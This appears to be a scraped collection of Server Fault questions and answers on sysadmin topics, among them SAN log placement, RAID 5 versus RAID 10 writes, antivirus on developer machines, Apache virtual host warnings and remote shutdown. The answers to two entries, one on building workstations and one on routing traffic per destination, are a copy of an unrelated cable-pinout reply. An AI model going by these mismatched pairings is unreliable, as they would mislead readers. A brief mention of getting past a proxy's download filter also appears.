It doesn't matter what is going to be around in 2015. Nobody can predict future but you shouldn't buy into proprietary platforms that are offered by single vendor. Amazon EC2 is good candidate to deploy your application on because Amazon compatible services can be easily provided by other companies as well. Even if you will want to host your application on your own servers at some point, it won't be a big problem. Amazon EC2 is practically zero lock-in. Google App Engine is just bad candidate because there is not going to be compatible product from other company for very long time if ever. It's just too proprietary and Google doesn't plan to release their technology. To me it's 100% lock-in and if you decide to move somewhere else, it will be impossible without massive rewrite. I would be very surprised if any ambitious and big project would bet on GAE. Windows Azure is not looking as bad as Google App Engine. Although it's still going to be hosted exclusively by Microsoft, it might be possible for other companies to come up with (almost) compatible cloud service. After all, core pieces of Windows Azure are based on well known SQL Server, IIS and .NET framework stack.
{ "source": [ "https://serverfault.com/questions/723", "https://serverfault.com", "https://serverfault.com/users/526/" ] }
767
Its standard practice to separate log and data files to separate disks away from the OS (tempdb, backups and swap file also) Does this logic still make sense when your drives are all SAN based and your LUNS are not carved of specific disk or raid sets -they are just part of the x number of drives on the SAN and the LUN is just space allocation
Logs and data drives have different data access patterns that are in conflict with each other (at least in theory) when they share a drive. Log Writes Log access consists of a very large number of small sequential writes. Somewhat simplistically, DB logs are ring buffers containing a list of instructions to write data items out to particular locations on the disk. The access pattern consists of a large number of small sequential writes that must be guaranteed to complete - so they are written out to disk. Ideally, logs should be on a quiet (i.e. not shared with anything else) RAID-1 or RAID-10 volume. Logically, you can view the process as the main DBMS writing out log entries and one or more log reader threads that consume the logs and write the changes out to the data disks (in practice, the process is optimised so that the data writes are written out immediately where possible). If there is other traffic on the log disks, the heads are moved around by these other accesses and the sequential log writes become random log writes. These are much slower, so busy log disks can create a hotspot which acts as a bottleneck on the whole system. Data Writes (updated) Log writes must be committed to the disk (referred to as stable media) for a transaction to be valid and eligible to commit. One can logically view this as log entries being written and then used as instructions to write data pages out to the disk by an asynchronous process. In practice the disk page writes are actually prepared and buffered at the time the log entry is made, but they do not need to be written immediately for the transaction to be committed. The disk buffers are written out to stable media (disk) by the Lazy Writer process (Thanks to Paul Randal for pointing this out) which This Technet article discusses in a bit more detail. This is a heavily random access pattern, so sharing the same physical disks with logs can create an artificial bottleneck on system performance. The log entries must be written for the transaction to commit, so having random seeks slowing down this process (random I/O is much slower than sequential log I/O) will turn the log from a sequenital into a random access device. This creates a serious performance bottleneck on a busy system and should be avoided. The same applies when sharing temporary areas with log volumes. The role of caching SAN controllers tend to have large RAM caches, which can absorb the random access traffic to a certain extent. However, for transactional integrity it is desirable to have disk writes from a DBMS guaranteed to complete. When a controller is set to use write-back caching, the dirty blocks are cached and the I/O call is reported as complete to the host. This can smooth out a lot of contention problems as the cache can absorb a lot of I/O that would otherwise go out to the physical disk. It can also optimise the parity reads and writes for RAID-5, which lessens the effect on performance that RAID-5 volumes have. These are the characteristics that drive the 'Let the SAN deal with it' school of thought, althoug this view has some limitations: Write-back caching still has failure modes that can lose data, and the controller has fibbed to the DBMS, saying blocks have been written out to disk where in fact they haven't. For this reason, you may not want to use write-back caching for a transactional application, particlarly something holding mission-critical or financial data where data integrity problems could have serious consequences for the business. SQL Server (in particular) uses I/O in a mode where a flag (called FUA or Forced Update Access) forces physical writes to the disk before the call returns. Microsoft has a certification program and many SAN vendors produce hardware that honours these semantics (requirements summarised here ). In this case no amount of cache will optimise disk writes, which means that log traffic will thrash if it is sitting on a busy shared volume. If the application generates a lot of disk traffic its working set may overrun the cache, which will also cause the write contention issues. If the SAN is shared with other applications (particularly on the same disk volume), traffic from other applications can generate log bottlenecks. Some applications (e.g. data warehouses) generate large transient load spikes that make them quite anti-social on SANs. Even on a large SAN separate log volumes are still recommended practice. You may get away with not worring about layout on a lightly used application. On really large applications, you may even get a benefit from multiple SAN controllers. Oracle publish a series of data warehouse layout case studies where some of the larger configurations involve multiple controllers. Put responsibility for performance where it belongs On something with large volumes or where performance could be an issue, make the SAN team accountable for the performance of the application. If they are going to ignore your recommendations for configuration, then make sure that management are aware of this and that responsibility for system performance lies in the appropriate place. In particular, establish acceptable guidelines for key DB performance statistics like I/O waits or page latch waits or acceptable application I/O SLA's. Note that having responsibility for performance split across multiple teams creates an incentive to finger-point and pass the buck to the other team. This is a known management anti-pattern and a formula for issues that drag out for months or years without ever being resolved. Ideally, there should be a single architect with authority to specify application, database and SAN configuration changes. Also, benchmark the system under load. If you can arrange it, secondhand servers and direct-attach arrays can be purchased quite cheaply on Ebay. If you set up a box like this with one or two disk arrays you can frig with the physical disk configuration and measure the effect on performance. As an example, I have done a comparison between an application running on a large SAN (an IBM Shark) and a two-socket box with a direct attach U320 array. In this case, £3,000 worth of hardware purchased off ebay outperformed a £1M high-end SAN by a factor of two - on a host with roughly equivalent CPU and memory configuration. From this particular incident, it might be argued that having something like this lying around is a very good way to keep SAN administrators honest.
{ "source": [ "https://serverfault.com/questions/767", "https://serverfault.com", "https://serverfault.com/users/626/" ] }
868
How can I have multiple IP addresses assigned to a single NIC? I remember doing this on Unix way back when. Can it be done on Windows?
Yes, it can be done in Windows: Go to the Control Panel > Network Connections Right click on the Local Area Connection (or whichever network connection you want to add the 2nd IP Address) and click Properties Click on Internet Protocol (TCP/IP) in the connection box and click properties Enter the first IP address in the properties box Click Advanced Click Add under the IP Addresses box and enter the information for the 2nd IP Address Close all the boxes
{ "source": [ "https://serverfault.com/questions/868", "https://serverfault.com", "https://serverfault.com/users/715/" ] }
906
What are tools/utilities that you should absolutely know while working as a Linux or Windows Sysadmin. I'm thinking for example about GNU/screen that you'll need if you're working on Linux servers.
vi - I know not everyone likes it, but its pretty much going to be on any *nix server you come across, and when everything else is broken you are going to need to edit config files. I would also suggest csh and sh for the same reasons
{ "source": [ "https://serverfault.com/questions/906", "https://serverfault.com", "https://serverfault.com/users/117/" ] }
918
I've heard that the write performance of RAID 5 can be appalling at times. While I want the redundancy that it provides I don't want to sacrifice my database insert/update times. Is this something I should be worried about and if so, what would be the recommendation to get redundancy with good write performance?
RAID 10 is usually recommended since the I/O is so random. Here's an example. The calculations are a bit simplified, but pretty representative. Let's say you have a 6 drive array and your drives can do 100 I/Os per second (IOPS). If you have 100% reads, all six drives will be used and you'll have about 600 IOPS for both RAID 10 and RAID 5. The worst case scenario is 100% writes. In that scenario, RAID 10's performance will be cut in half (since each write goes to two drives), so it will get 300 IOPS. RAID-5 will convert each write into two reads followed by two writes, so it will get 1/4 the performance or about 150 IOPS. That's a pretty big hit. Your actual read/write pattern will be somewhere in-between these two extremes, but this is why RAID 10 is usually recommended for databases. However, if you don't have a busy database server, then you could even do RAID-6. I often do that if I know the database isn't going to be bottleneck since it gives you much more safety than RAID 10 or RAID 5.
{ "source": [ "https://serverfault.com/questions/918", "https://serverfault.com", "https://serverfault.com/users/750/" ] }
919
What is the wiring order for an 10/100/n-Base-T patch cable? What about a crossover (x-over) cable?
Doing a google image search for "cat5 pinouts" has plenty of others as well
{ "source": [ "https://serverfault.com/questions/919", "https://serverfault.com", "https://serverfault.com/users/715/" ] }
923
To save some money I'm sure we would all prefer to build our own workstations. But this takes a lot more work than simply buying one off the shelf. With any luck, you'll end up with a better machine for a lower price. What methodologies do you use to decide on which parts to buy? Do you look at benchmarks? Do you find things that have compatible bus speeds? How do you know where to look to make sure everything will be compatible? Do you buy a bare bones machine and extend it?
Doing a google image search for "cat5 pinouts" has plenty of others as well
{ "source": [ "https://serverfault.com/questions/923", "https://serverfault.com", "https://serverfault.com/users/745/" ] }
926
I have multiple network interfaces on a Windows client machine. I would like for some IP traffic to go through one card and other traffic to go through the other card based upon the IP (actually, I would prefer domain names) of the destination server. I see no way to configure this using the Windows GUI. Can I do this in WinXP+? If it's complicated, then some pointers to good articles would be sufficient as my Googling skillz seems to fail here.
Doing a google image search for "cat5 pinouts" has plenty of others as well
{ "source": [ "https://serverfault.com/questions/926", "https://serverfault.com", "https://serverfault.com/users/712/" ] }
959
How do you recommend destroying sensitive information on a hard drive? I've used DBAN in the past, is that good enough?
DBAN is just fine. Here's the dirty little secret--any program that overwrites every byte of the drive will have wiped everything permanently. You don't need to do multiple passes with different write patterns, etc. Don't believe me? See the standing challenge to prove that a drive overwritten with 0s once can be recovered. Nobody seems willing to take up the challenge. http://16systems.com/zero.php
{ "source": [ "https://serverfault.com/questions/959", "https://serverfault.com", "https://serverfault.com/users/32/" ] }
1,014
What are people using for website monitoring services? I am referring to a service that I can configure specific hits to my site to monitor if the site is up, and how fast it is responding to the requests. I am looking for an external service, that will hit my server from several locations, and will provide me notification if the site does not respond within certain tolerances. It can be free or paid.
Here's a breakdown of the major players in the external performance monitoring space: Top Shelf Webmetrics.com - largest network, great monitoring technology, fun UI Keynote.com - focused on mobile, long time player in the space Gomez.com - lots of different products, product life cycle focus Middle AlertSite.com - does a lot of things, nothing extremely well Pingdom.com - popular in the web 2.0 world site24x7.com - owned by zoho, cheap webmon.com - Supports escalations, custom triggers and realtime dashboards Low End monitis.com siteuptime.com dotcom-monitor.com What you need to look for in deciding between the various options: If you want to monitor a transaction, versus just a URL, you should try out the scripting technology to understand how easy/complicated it is to set up your monitoring. The monitoring network, how many locations around the world you want to get performance metrics from The alerting options, how configurable the thresholds/escalations are. The reporting, how useful the various reports/graphs are, and how much you can drill down into the nitty gritty.
{ "source": [ "https://serverfault.com/questions/1014", "https://serverfault.com", "https://serverfault.com/users/721/" ] }
1,046
For software developers, there are some books you must absolutely read. What is the single most influential book every programmer should read? How about for sysadmins? Is there a similar list of books?
The only essential I have is The Practice of System and Network Administration by Limoncelli, Hogan, et al. My first edition copy lives on my desk
{ "source": [ "https://serverfault.com/questions/1046", "https://serverfault.com", "https://serverfault.com/users/775/" ] }
1,217
What antivirus would you recommend for computers used for windows development. Would you use an antivirus for these users? These users compile quite often and therefore read and write tons of files. If I deploy a slow performing antivirus, they will not be happy.
You NEED antivirus software It's been said a few times in these answers that developers should know better, or should only install software they need from known good sites, etc, so if you need antivirus you have a social issue, not a technical issues. A few points on that: Prevention is only one of the functions of antivirus. Even if your vendor is slow about getting new definitions out, if your software detects a virus on your machine after the fact you're much better off than if you had no AV software at all. Everyone, no matter how brilliant, makes mistakes. You cannot bet your infrastructure on the perfection of your employees' awareness. Downloading software is only one vector of viral attack. What about software vulnerabilities? What if a "known-good" software site is hijacked? What if automatic update software (Java, Adobe, Apple, MS, whatever) is compromised? Your security is too valuable to leave in the hands of your employees and your vendors. Unless you're a very small company, you have non-technical people working with you. Receptionists, office managers, sales people, etc. If your devs are perfect and your receptionist clicks a bad link his mom sent to him, your network is compromised. Installing AV software on all machines except your developers' leaves the (arguably) most valuable workstations unprotected. Your developers have software on their machines that is not "necessary" for their jobs. Guaranteed. iTunes, AIM, other apps they've discovered that they like. They're smart enough to get around policies/software that tries to prevent this. My recommendations At Fog Creek, we use ESET NOD32. I have tested Symantec, Kaspersky, Norton, ZoneAlarm, Avast, and AVG. All of them have noticeable performance issues, and many were downright unusable for our devs (blocked debuggers, caused issues when hooking into system calls, etc). NOD32 has been deployed for nearly a year now, and I've only had a single dev run into any trouble with it (and that was fixed by checking a configuration option). It causes no noticeable performance hit, doesn't interfere with any of our tools, and is unbelievably simple to setup - I deployed it across all of our workstations and servers in the middle of the day from the comfort of my desk. The only trouble we had with NOD32 was a big performance hit when running VMWare Workstation during our evaluation period. After exempting all VMWare files from realtime scanning, the problem disappeared.
{ "source": [ "https://serverfault.com/questions/1217", "https://serverfault.com", "https://serverfault.com/users/888/" ] }
1,405
When my Ubuntu Apache server (Apache 2) starts up I get a warning message that reads: [warn] NameVirtualHost *:80 has no VirtualHosts However, the web server is working fine. What might I have wrong in my site's configuration to make it give me this warning? The configuration file in question (located in /etc/apache2/sites-available ) reads like (details removed for brevity) <VirtualHost *> <Location /mysite> # Configuration details here... </Location> # Use the following for authorization. <LocationMatch "/mysite/login"> AuthType Basic AuthName "My Site" AuthUserFile /etc/sitepasswords/passwd Require valid-user </LocationMatch> </VirtualHost> Could the fact that I'm using <Location> be a part of the problem?
Change <VirtualHost *> to read <VirtualHost *:80> Or its (NameVirtualHost *:80) added twice in your apache2 Confing file. ( By Default its added in ports.conf file ) This should clear the error. Aside: you shouldn't ignore this error. Apache's config, especially when globbing virtual hosts (eg Include /etc/httpd/vhosts.d/*) is not stable. That means you don't control the order of loading the hosts explicitly so the default vhost for an IP becomes the one that is loaded first, which can lead to unintended consequences. One example of this is the default vhost for an IP will also be available on that IP, rather than its name . This can cause information to leak onto google referring to your sites IP rather than name, which can be confusing for customers. The NameVirtualHost error above can be a hint that apache has loaded things in a non optimal way, so you shouldn't ignore it.
{ "source": [ "https://serverfault.com/questions/1405", "https://serverfault.com", "https://serverfault.com/users/916/" ] }
1,473
We've all seen good and bad examples of cable management. What are objective, measurable requirements that can be used in a policy to maintain cabling order in the rack/server room/data center? I'm not looking for "Don't do spaghetti wiring!" but practical, objectively measurable policy that can be readily explained, followed, and inspected for whether it passes or fails the requirements in the policy. Please avoid, "Don't do x, y, or z" - instead re-form the requirement as a "Do A, B, and C" where following the second requirement will eliminate the problems explained in the first requirement.
Use cables as close to the correct length as possible. Spare cable should be coiled away from the concentrator - so spare power cable gets coiled next to the machine, not the powerstrip, and spare network cable next to the machine, not the hub. Don't be stingy with cable ties, be they zip ties or velcro pulls. When in doubt, use an extra, and don't hesitate to trash old ones. Machines should still be removable once unplugged, which means run your cables vertically down the edges of the rack, not the middle. Only run cross-rack in one place (probably the top or bottom of the rack), and run as little cross-rack as possible. Color coding is good, but when troubleshooting, what is trumps what's supposed to be. Fix it all now . 'Later' never comes. Corollary: everything should always be perfect before you leave - or you have concrete plans to come back and fix it. Label cable ends with abstractions: numbers, letters, whatever. Don't bother with 'firewall', 'external', etc - they'll get moved and re-used and the labels will be wrong; better to keep the labels an extension of the 'color' so they can be easily reused without having to be relabeled. A lot of this is from old telco practice - you think we manage a lot of cables, you should look inside a real telco crossconnect sometime - well, but don't because they're often spaghetti.
{ "source": [ "https://serverfault.com/questions/1473", "https://serverfault.com", "https://serverfault.com/users/706/" ] }
1,649
My Windows Server 2003 Std server refuses to server ASP.NET content. It serves regular html just fine but anything .net, even a one line html file with an ASPX extention fails silently. Things I've tried: Nothing in the event log or IIS WWW logs when it fails. Fiddler shows no response I reinstalled .NET with C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis.exe -U C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis.exe -I I give obscenely high permissions on everything I can think of (full control, read, write, etc.) to all possibly relevant users (IUSER*, ASP.NET, etc.). I confirmed that ASP.Net v1 and v2 Web Service Extensions are "allowed" in IIS Confirmed that the Server Manager had IIS and ASP.Net roles enabled Again: this is the scenario: http://localhost/Test/Default.htm <-- Works great! http://localhost/Test/Default.aspx <-- Bombs silently with no message at all Any guidance will be much appreciated! Solution: I reinstalled per the instructions below and it works now. Thanks all!
I've run into this exact issue several times, and every time, the solution was to: go to the Control Panel go to the "Windows Components" area remove IIS, let it uninstall reboot re-add IIS ( make sure to include the ASP.NET stuff when you check off the boxes ). Run this: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727>aspnet_regiis.exe -I I spent hours debugging this at a client site once, and that was the trick. Since then, every time this has happened, this was the fix. I'm not sure what the root cause is, but we tore the IIS configuration apart once trying to figure it out, and even had Microsoft RDC'ing into the server in question for 2 or 3 hours, and they couldn't help either. So I write it off as an undocumented bug in ASP.NET/IIS.
{ "source": [ "https://serverfault.com/questions/1649", "https://serverfault.com", "https://serverfault.com/users/375/" ] }
1,668
This might seem like a silly (or nefarious) question at first glance, but allow me to elaborate... We have implemented all sorts of measures on the company network and proxy to prevent the download of certain file types on to company machines. Most files, even zip files with exe's inside get blocked when clicking to download those files. But some "enterprising" users still manage to get downloads to work. For example, I was standing behind someone (who didn't know me or which department I worked in), who in front of our eyes changed a URL that ended with ".exe" to ".exe?", and the browser went right ahead and downloaded the "unknown" file type. We've since then plugged this hole, but I'd like to know if anyone else knows of any nefarious means of downloading files bypassing network security and checking software. Or perhaps if you know of some commercial software that you can swear is bulletproof, and we can trial it for a while. Any help appreciated...
Regardless of what technical solution you come up with, someone will find a way around it. If you're serious about this (and not just doing it to discourage casual downloads or fulfill some faceless policy mandate), then please, please , Talk to your users! Explain why you're blocking what you're blocking. Help them to understand the importance of it. And then listen to them when they tell you why they still need to download executable files, and help them find a way to do their jobs without making your job harder. For years, one of our suppliers had a system similar to yours in place. Unfortunately, they were also responsible for providing us with regular updates to their pricing software, and during testing it was common for executables to frequently travel back and forth between our networks. Due to the filters, we all just got in the habit of renaming files (.exe -> .ear, etc.), compressing them, compressing then renaming them, even using personal machines to transfer them... not only subverting the restrictions and amplifying the potential danger to both companies, but also destroying much of our respect for those behind the restrictions. Finally, someone got the message and set up a secured FTP server for us to use. It's all too common to focus on the technical side of things, and forget about the resourceful humans who must deal with the consequences of them. Naturally, if you're already doing this, then more power to you!
{ "source": [ "https://serverfault.com/questions/1668", "https://serverfault.com", "https://serverfault.com/users/246/" ] }
1,669
I know there was a command on Unix that I could use to monitor a file and see changes that are getting written to it. This was quite useful especially for checking log files. Do you know what it is called?
Do you mean tail -f logfile.log ? ( Man page for tail )
{ "source": [ "https://serverfault.com/questions/1669", "https://serverfault.com", "https://serverfault.com/users/1127/" ] }
1,701
We've backed up our data on LTO tapes for years and it's a real comfort to know we have everything on tape. A sister project and one of our data providers have both moved to 100% disk storage because the cost of disk has dropped so much. When we propose systems to potential customers these days we tend to downplay or not mention our use of tape systems for data storage since it might seem outdated. I feel more comfortable with having data saved in two separate formats: disks and tape. In addition, once data is securely written to tape, I feel (perhaps naively) that it's been permanently saved. Not having to rely on a RAID controller to be able to read back data is another plus for me. Do you see a place for tape backup these days?
The main advantage of tapes is that it's easy to put them into a rotation scheme and store them off-site for long term backup. You can do the same with disks, but usually they're not that easily fitted into a rotation cycle, and you'll have to store them carefully to avoid damaging them (same goes for tape as well of course, but they're easier to handle).
{ "source": [ "https://serverfault.com/questions/1701", "https://serverfault.com", "https://serverfault.com/users/1126/" ] }
1,750
I've been out of the virtual machine market for a while. Back in 2005, I used Microsoft Virtual PC 2004 (not free) and the current version of VMWare (not free). What are some good, free solutions? I'm sick of trying out new software on my host OS and hosing it!
I've been using Sun's VirtualBox for the past little while, and I have been completely happy with it. Update: I have been wanting to update this to provide some of the reasons why I am perfectly happy with it, but in doing that I will take way from the comments that other's have added. So, with that said, I highly recommend people read the associated comments.
{ "source": [ "https://serverfault.com/questions/1750", "https://serverfault.com", "https://serverfault.com/users/1115/" ] }
1,782
Given a new office, new desks, and very little limitation on per-person costs (within reason - virtual reality helmets are not likely) what is the ideal number, size, and orientation of (presumably flat-screen LCD) monitors to maximize productivity, efficiency, and accuracy in coding? If it's relevant, assume .NET development for a web environment, employees in individual offices with large desks. The coders are currently IMing for most conversation, though all are on-site, and web browsing is a part of the job.
There's no such thing as an "ideal monitor setup" because there's no such thing as a "canonical user" either ! (plus the setup you need depends on the tasks you have to perform) That being said, the strategy I use at my company is simple : Get every developer as many monitors as he asks for. Plain and simple. (And I should mention I am running this company, so I'm basically the one paying for hardware ; that being said, I used the same strategy in my previous work position, when I was running a middle-sized .net programming team in a top-tier Investment Bank) Three reasons to use this strategy : A typical monitor costs around $300 and will probably be used for say 3 years... That's a total cost of ownership of around $.5 a day including electricity. The cost of 'ownership' of a good programmer is rather in the $500's a day. In other words, a monitor pays for himself as soon as he saves 1 minute a day of a programmer's time. You acknowledge the fact that your programmers know better than you what they need to get their work done (which is a strong motivator for them). I use to tell my team-members : If you need something to get your work done, just buy it, or ask me to get it bought. I don't want to waste your time arguing over why you need an USB rocket launcher. You probably know better than me what you need :) You acknowledge the fact that your programmers work is important enough to let them having the best tools money can buy (again, a very strong motivator) In fact, programmers are so expensive that almost everything that can ease their job is worth buying. I'm talking about : as many monitors as they need a very fast computer, SSD, quadcore, you name it. another computer, if it's needed all the books he might want to look at To end with, a few words about my current setup for developing a .net software (YMMV if you're either not me, not me in may '09, or not developing a .net software) two verticals 22" 1920*1080 monitors, displaying a vertically-split Visual Studio one landscape 22" 1920*1080 monitor for VS's toolboxes (solution explorer, toolbox, etc.) and other various tools (SQL Management Studio, namely) one landscape 22" 1920*1080 monitor for firefox/IM/outlook A good reason to add an extra-monitor is if you need some things to be constantly visible (such as supervision tools) In my experience, I hate working with only one monitor, 2 is ok, my productivity still benefits for a third one, and extra monitors are not really needed.
{ "source": [ "https://serverfault.com/questions/1782", "https://serverfault.com", "https://serverfault.com/users/1107/" ] }
1,797
Does Windows 7 have native support for mounting CD/DVD ISO images? If not, what is the best tool to use for that under Windows 7 64-bit? I am looking for a solution to allow installing MSDN downloads without burning them to CD/DVD.
My preference is Slysoft Virtual Clone Drive . It's great because: you can mount/dismount by right-clicking on the drive the drive remembers what has been mounted before you can mount an iso by right-clicking the ISO itself. No issues with device driver signing, etc. I dumped Daemon Tools a while ago. Using it on Win7 7100 64 bit with no problem. Feels quite fast.
{ "source": [ "https://serverfault.com/questions/1797", "https://serverfault.com", "https://serverfault.com/users/1190/" ] }
1,966
One thing that annoys me no end about Windows is the old sharing violation error. Often you can't identify what's holding it open. Usually it's just an editor or explorer just pointing to a relevant directory but sometimes I've had to resort to rebooting my machine. Any suggestions on how to find the culprit?
I've had success with Sysinternals Process Explorer . With this, you can search to find what process(es) have a file open, and you can use it to close the handle(s) if you want. Of course, it is safer to close the whole process. Exercise caution and judgement. To find a specific file, use the menu option Find->Find Handle or DLL... Type in part of the path to the file. The list of processes will appear below. If you prefer command line, Sysinternals suite includes command line tool Handle , that lists open handles. Examples c:\Program Files\SysinternalsSuite>handle.exe |findstr /i "e:\" (finds all files opened from drive e:\ " c:\Program Files\SysinternalsSuite>handle.exe |findstr /i "file-or-path-in-question"
{ "source": [ "https://serverfault.com/questions/1966", "https://serverfault.com", "https://serverfault.com/users/1232/" ] }
2,016
I often find myself opening several ssh connections in order to view several log files at a time with tail -f . This isn't a problem when I'm at home because I use public key encryption for password-less login. However, I will often use computer at my university to do this so I don't have the option of using my private key. It gets annoying to enter my password 4 or 5 times to get several terminal windows. How can I get multiple terminals over a single connection?
Just use GNU screen , it's great as you can start up remote sessions and restore them if your connection drops. It's available as a package for most distributions and may even already be installed on your university system. The manual will give you all you need to get started, by default all commands are preceeded by Ctrl+A . For example to bring up the onscreen help, just press Ctrl+A then press ?
{ "source": [ "https://serverfault.com/questions/2016", "https://serverfault.com", "https://serverfault.com/users/1279/" ] }
2,106
I have multiple web sites hosted with IIS 6.0 on Windows Server 2003. Some of them use the .Net 1.1 framework while the others use .Net 2.0. I currently have application pools set up for each framework. Are there any other reasons to add additional application pools?
Yes, many: AppPools can run as different identities, so you can restrict permissions this way. You can assign a different identity to each app pool so that when you run task manager, you know which w3wp.exe is which. You can recycle/restart one app pool without affecting the sites that are running in different app pools. If you have a website that has a memory leak or generally misbehaves, you can place it in an app pool so it doesn't affect the other web sites If you have a website that is very CPU-intensive (like resizing photos, for instance), you can place it in its own app pool and throttle its CPU utilization If you have multiple websites that each have their own SQL database, you can use active directory authentication instead of storing usernames/passwords in web.config.
{ "source": [ "https://serverfault.com/questions/2106", "https://serverfault.com", "https://serverfault.com/users/854/" ] }
2,107
I've had to load test HTTP servers/web applications a few times, and each time I've been underwhelmed by the quality of tools I've been able to find. So, when you're load testing a HTTP server, what tools do you use? And what are the things I'll most likely do wrong the next time I've got to do it?
JMeter is free. Mercury Interactive Load Runner is super nice and super expensive.
{ "source": [ "https://serverfault.com/questions/2107", "https://serverfault.com", "https://serverfault.com/users/1299/" ] }
2,219
Since I'm not a hardware expert, I don't know what features make a network switch a good network switch. What should I pay attention, when I'm comparing the different models from different vendors?
It is all about features, and the quality of the device. You can usually check the quality of the device by looking for reviews for that particular device. Features you want to look at Port count, and link speed for each port Remote administration features. How will you configure the switch, http, https, ssh, telnet, proprietary tool. The bandwidth of the backplane. A switch should be able allow for lots of simultaneous conversations. For a 1GB, you might expect to see a 10GB backplane. VLAN support, this allows you to have multiple virtual networks. Etherchannel/Bonding/Link Aggregation. It is possible to merge many ports into a single trunk. Routing/Firewalling L3 features. These days, many advanced switches including routing functionality. Quality of Service (QoS), if you will be using Voip, having QoS is pretty much required. Stackability, Many switches can be stacked using a special cable which allows them to be managed as a single unit. POE, some types of devices like phones can be powered by a switch. If you have a small network, you probably don't really need most of the features, and a simple inexpensive switch will be fine. If you have high security demands, a VoiP system, a complex network, you'll need more features.
{ "source": [ "https://serverfault.com/questions/2219", "https://serverfault.com", "https://serverfault.com/users/45/" ] }
2,232
i trying to see how much electricity is required to power 'x' number of computers. I know it's a vague thing because some computers draw more than others (eg. diff chipsets, HDD, vid cards, PSU's, etc). So, lets just assume is a mum-and-dad Dell computer with some average run of the mill stuff. Nothing fancy. 20" LCD's. this is to help calculate the generator power required to keep around 'x' computers running in a LAN. The real figure is in the hundreds .. but i'm assuming i can just figure out the base cost for one machine and then multiple it by the number of seats. I understand this doesn't include Switches Servers cooling (fans), etc...
I did some stats on this a while ago FWIW, using the handy dandy kill-a-watt .. Typical Developer Dell PC (2.13 GHz Core 2 Duo, 2 GB RAM, 10k RPM 74 GB main hard drive, 7200 RPM 500 GB data drive, Radeon X1550 video) Sleep 1 w Idle 80 w One CPU core fully loaded 108 w Both CPU cores fully loaded 122 w Standard Developer Thinkpad T-60 Laptop (core 2 duo 2.0 GHz, 100GB hdd, ATI X1400 video) Sleep 1 w Idle 66 w One CPU core fully loaded 74 w Both CPU cores fully loaded 82 w LCDs Old Dell 19" 50 w Ancient, giant 21" NEC 67 w New Dell 19" 28 w New Samsung 19" 28 w Apple 23" LCD 72 w Samsung 24" LCD 54 w It turns out with the LCDs the default brightness level has a lot to do with how much power they draw. I almost immediately turn any LCD I own down to 50% bright, just because my eyes are overwhelmed if I don't...
{ "source": [ "https://serverfault.com/questions/2232", "https://serverfault.com", "https://serverfault.com/users/58/" ] }
2,327
What do you find as the best ISO / disk image mounting software out there? You can give a nod to $$$ alternatives, but I'm looking for the best freeware and support for DVD-size images as well. EDIT I actually use Virtual Clone Drive regularly, and would recommend that over anything else.
I would prefer the free (for non-commercial purposes) version of Daemon Tools Lite . Some other tools (merged from the other answers): Virtual Clone Drive Magic ISO Microsoft Virtual CD-ROM Control Panel Gizmo Drive
{ "source": [ "https://serverfault.com/questions/2327", "https://serverfault.com", "https://serverfault.com/users/458/" ] }
2,382
Trips to the server room can mean extended periods away from the comforts of home, or at least your desk. Especially if it is an off-site hosting facility. What should you take with you, apart from a warm sweater for places with good air-conditioning?
Things that I always carry on my person, so would be present: cell phone iPod pen/notepad thumb drive multitool Things that I keep in my laptop bag so I don't have to think about it: "carb bars" (I don't know what these are, but they last forever. My wife made me start carrying them after I had to sleep in a data center during a blizard.) quarters for snack/pop machines a baggy of splenda (nothing worse than being stuck with people who only drink their coffee black) notepad Post-it notes recovery disks (live CDs) USB/serial/RS-232 cables and adapters (the 5-in-1 cable kit specifically, though I;ve tweaked it to have things like T1 loopbacks) penlight electrical tape CO scissors (the kind that central office guys always carry around that you can cut and strip wires with) screwdriver (the kind with 6 ends) a small hand mirror for looking behind/around things Things I keep in my toolbag - not guaranteed to have with me always, but I usually know if I'll need it: a second 5-in-1 kit and some more cables crimpers with RJ45 and RJ11 ends labels (like, mailing labels - very sticky and handy for rapid labeling until a professional job can be done with a label maker screwdrivers/plyers/end cutters/small socket set - basic tools a huge screwdriver that can either be used as a crow bar or to reach the mounting screws on devices that stick out of the rack (like mid-mounting a 40-inch server in a 2-post telco rack) velcro wraps and wax string (never used wax string? Try it, it's awesome) a collection of writing utensils including sharpies and wax pencils to write on racks a collection of screw driver heads - flat, phillips, hex, torx(sp?), and some other specialty ones spare heavy-duty power extension cords and a three-plug expander a decent digital mutilmeter duct tape I think I have more, but that's the basics. Everything on that list addresses a specific need I've had in my career. The laptop bag is heavy but well worth the bulk in saved trouble. The tool bag I'm rather proud of, it's not big (it's one of those "big mouth" bags that opens like a doctor's black bag), maybe 18 inches long and 12 wide. I spent a great deal of time customizing the contents to maximize the value for the volume. For instance, I threw away the bulky plastic container the socket kit came in; I built a much smaller organizer for it. Same with the screw heads - I built a cloth with elastic on it that the heads slide into. It's also modular - all the screw drivers are in a large pencil case, so I can find them easily and, if I know I will only need them, I can just grab them out of my car and carry them into the DC instead of the whole tool bag.
{ "source": [ "https://serverfault.com/questions/2382", "https://serverfault.com", "https://serverfault.com/users/1427/" ] }
2,391
I need to shutdown and / or reboot remote system. Can this be done remotely without physically being next to the server?
Reboot now: shutdown /r /m \\computername /t 0 Shutdown now: shutdown /s /m \\computername /t 0 In both examples, change the 0 to a number of seconds to delay if desired. Plenty of other options you can get from: shutdown /?
{ "source": [ "https://serverfault.com/questions/2391", "https://serverfault.com", "https://serverfault.com/users/163/" ] }
2,424
When server storage gets low developers all start to moan, "I can get a 1 TB drive at Walmart for 100 bucks, what's the problem". How can the complexities of storage be explained to developers so that they will understand why a 1 TB drive from Walmart just won't work. p.s. I'm a developer and want to know too: )
